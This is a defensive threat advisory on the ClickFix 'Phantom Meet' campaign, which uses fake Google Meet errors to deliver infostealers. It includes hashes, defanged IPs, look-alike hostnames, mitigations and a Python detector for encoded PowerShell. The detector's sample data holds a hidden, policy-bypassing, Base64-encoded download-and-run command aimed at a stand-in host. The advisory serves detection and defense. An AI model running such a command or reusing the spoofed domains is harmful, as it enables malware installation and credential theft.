Malware Hidden Behind Google Meet Deception in ClickFix Campaign

Threat Group: Slavic Nation Empire, Scamquerteo
Threat Type: Infostealer Malware, Social Engineering
Techniques Used (MITRE ATT&CK): Application Layer Protocol (T1071), User Execution (T1204), Phishing (T1566), PowerShell (T1059.001)
Malware Used: Stealc, Rhadamanthys, AMOS Stealer
Threat Score: High (8.2/10) — The campaign employs sophisticated social engineering tactics, targeting both Windows and macOS systems with infostealers.
Last Threat Observation: October 18, 2024


Overview

The ClickFix campaign, particularly its variant called "The Phantom Meet," is a new social engineering attack that leverages fake Google Meet pages to deceive users into downloading and executing malicious scripts. The attackers display fabricated error messages on spoofed Google Meet interfaces, tricking users into running malware through PowerShell or terminal commands. This operation, active since 2024, is linked to cybercriminal groups "Slavic Nation Empire" and "Scamquerteo," focusing on cryptocurrency scams.

Key Details

  • Delivery Method: The attack begins with phishing emails or compromised websites mimicking legitimate Google Meet error messages, prompting users to fix an alleged issue by running malicious code.
  • Target: The primary targets are users in Poland and cryptocurrency enthusiasts, with both Windows and macOS systems affected.
  • Functions:
    • Infostealing capabilities via Stealc, Rhadamanthys, and AMOS Stealer.
    • PowerShell scripts to download additional payloads.
    • Data exfiltration, focusing on cryptocurrency wallets and sensitive credentials.
    • Obfuscation of the pasted command using Base64-encoded scripts, so the user (and simple inspection) cannot see what it does.
    • Use of fake Google Meet infrastructure to add legitimacy.

Attack Vectors

The attack employs phishing as the initial vector. Upon visiting a spoofed Google Meet page, users are shown an error message prompting them to copy and paste a PowerShell script (or a terminal command on macOS) to resolve a supposed issue. Once executed, the script installs infostealers such as Stealc or Rhadamanthys, which siphon sensitive data and system information, including cryptocurrency wallets. The campaign evades detection with Base64-encoded scripts and with look-alike domains that impersonate Google Meet.

Known Indicators of Compromise (IoCs)

File Hash (MD5):

  • 51f8527e20dcb05ffd8586b853937a8a
  • ba0767946d9cac95fd727d7076c7fec1
  • e7959e4089c1993045e01cb9c3cbc6a5

File Hash (SHA1):

  • 31c713eabc90f61b44703a8d30e7ced6e2941f23

File Hash (SHA256):

  • 2853a61188b4446be57543858adcc704e8534326d4d84ac44a60743b1a44cbfe
  • 92a8cc4e385f170db300de8d423686eeeec72a32475a9356d967bee9e3453138
  • 94379fa0a97cc2ecd8d5514d0b46c65b0d46ff9bb8d5a4a29cf55a473da550d5
  • a834be6d2bec10f39019606451b507742b7e87ac8d19dc0643ae58df183f773c

IPv4 Addresses:

  • 77[.]221[.]157[.]170
  • 85[.]209[.]11[.]155
  • 95[.]182[.]97[.]58

URLs:

Domains:

Hostnames:

  • meet.googie.com-join.us, meet.google.cdm-join.us, meet.google.com-join.us
  • meet.google.us-join.com, meet.google.us07host.com, meet.google.web-join.com
  • meet.google.webjoining.com

Mitigation and Prevention

  1. User Awareness: Educate employees on phishing tactics, especially involving fake Google Meet error messages.
  2. Email Filtering: Strengthen filters to block phishing emails containing suspicious HTML attachments.
  3. PowerShell Restrictions: Limit the use of PowerShell commands, especially for non-admin users.
  4. Antivirus Protection: Ensure up-to-date antivirus software that can detect infostealers like Stealc, Rhadamanthys, and AMOS Stealer.
  5. Two-Factor Authentication: Enforce 2FA for critical accounts, particularly cryptocurrency wallets.
  6. Monitor Logs: Regularly check system logs for suspicious PowerShell activity.
  7. Regular Updates: Keep systems and software updated to reduce vulnerabilities.
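The Base64-encoded PowerShell described under Attack Vectors is also the most practical hook for mitigation 6 (monitoring logs). The script below is an added example, not part of the original advisory: it scans constructed records in the shape of PowerShell Script Block Logging (Event ID 4104) entries, decodes any -EncodedCommand payload (PowerShell encodes it as UTF-16LE Base64) and flags blocks that combine an encoded or hidden launch with a download cradle. The sample events, the example.invalid URL and the scoring threshold are assumptions made for the demonstration.

```python
import base64
import re

# Constructed sample records in the shape of Script Block Logging (Event ID 4104)
# entries; they are not real telemetry from the campaign.
SAMPLE_EVENTS = [
    {"id": 1, "user": "alice", "script": "Get-ChildItem C:\\Users\\alice\\Documents"},
    {"id": 2, "user": "bob",
     "script": "powershell -w hidden -ep bypass -enc " + base64.b64encode(
         ("iwr http://example.invalid/fix-error -OutFile $env:TEMP\\fix.exe; "
          "Start-Process $env:TEMP\\fix.exe").encode("utf-16-le")).decode()},
    {"id": 3, "user": "carol", "script": "Write-Host ([Convert]::ToBase64String([byte[]](1,2,3)))"},
]

# -e / -enc / -EncodedCommand followed by a Base64 token of plausible length
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|curl)\b", re.I),
    "launch": re.compile(r"\b(?:start-process|iex|invoke-expression)\b", re.I),
}

def decode_encoded_command(script):
    """Return the decoded -EncodedCommand payload (UTF-16LE Base64), or None if absent/invalid."""
    m = ENCODED_RE.search(script)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_event(event):
    """Score one script block; the decoded payload is scanned together with the wrapper."""
    decoded = decode_encoded_command(event["script"])
    text = event["script"] + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    if decoded:
        hits.insert(0, "encoded_command")
    # Assumed threshold: a download cradle plus at least two other ClickFix-style traits.
    return {"id": event["id"], "user": event["user"], "decoded": decoded,
            "hits": hits, "suspicious": "download_cradle" in hits and len(hits) >= 3}

def find_suspicious(events):
    """Return the analyses of events that trip the alert threshold."""
    return [a for a in map(analyze_event, events) if a["suspicious"]]

if __name__ == "__main__":
    for a in find_suspicious(SAMPLE_EVENTS):
        print(f"event {a['id']} user={a['user']} hits={a['hits']}\n  decoded: {a['decoded']}")
```

Feed real 4104 ScriptBlockText values in place of the constructed records; a hit on the decoded text is what distinguishes a pasted ClickFix command from ordinary administrative PowerShell.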

Conclusion

The ClickFix campaign represents an advanced and evolving cyber threat, combining social engineering with sophisticated malware distribution. The use of fake Google Meet pages and phishing emails demonstrates the attackers' adaptability, particularly in targeting cryptocurrency users. By implementing robust email filtering, limiting PowerShell access, and educating users on these tactics, organizations can significantly reduce the risk of compromise.